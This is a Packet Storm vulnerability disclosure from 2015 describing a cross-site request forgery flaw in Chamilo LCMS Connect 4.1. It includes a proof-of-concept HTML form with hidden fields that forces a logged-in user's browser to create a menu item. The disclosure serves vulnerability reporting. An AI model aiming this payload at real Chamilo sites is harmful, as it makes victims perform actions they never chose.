Chamilo LCMS Connect 4.1 Cross Site Request Forgery

2015-03-27T00:00:00
ID PACKETSTORM:131067
Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2015-03-27T00:00:00

Description

                                        
                                            `Hi Team,  
  
#Affected Vendor: http://lcms.chamilo.org/  
#Date: 27/03/2015  
#Discovered by: Joel Vadodil Varghese  
#Type of vulnerability: XSRF  
#Tested on: Windows 7  
#Product: LCMS Connect  
#Version: 4.1  
#Description: Chamilo is an open-source (under GNU/GPL licensing)  
e-learning and content management system, aimed at improving access to  
education and knowledge globally. Chamilo LCMS is a completely new software  
platform for e-learning and collaboration. The application is vulnerable to  
XSRF attacks. If an attacker is able to lure a user into clicking a crafted  
link or by embedding such a link within web pages he could control the  
user's actions.  
  
#Proof of Concept (PoC):  
------------------------------------  
<form method="POST" name="form1" action="  
http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem  
">  
<input type="hidden" name="parent" value="0"/>  
<input type="hidden" name="title[de]" value=""/>  
<input type="hidden" name="title[en]" value="tester"/>  
<input type="hidden" name="title[fr]" value=""/>  
<input type="hidden" name="title[nl]" value=""/>  
<input type="hidden" name="application" value="weblcms"/>  
<input type="hidden" name="submit_button" value="Create"/>  
<input type="hidden" name="_qf__item" value=""/>  
<input type="hidden" name="type" value="core\menu\ApplicationItem"/>  
</form>  
  
  
--   
Regards,  
  
*Joel V*  
`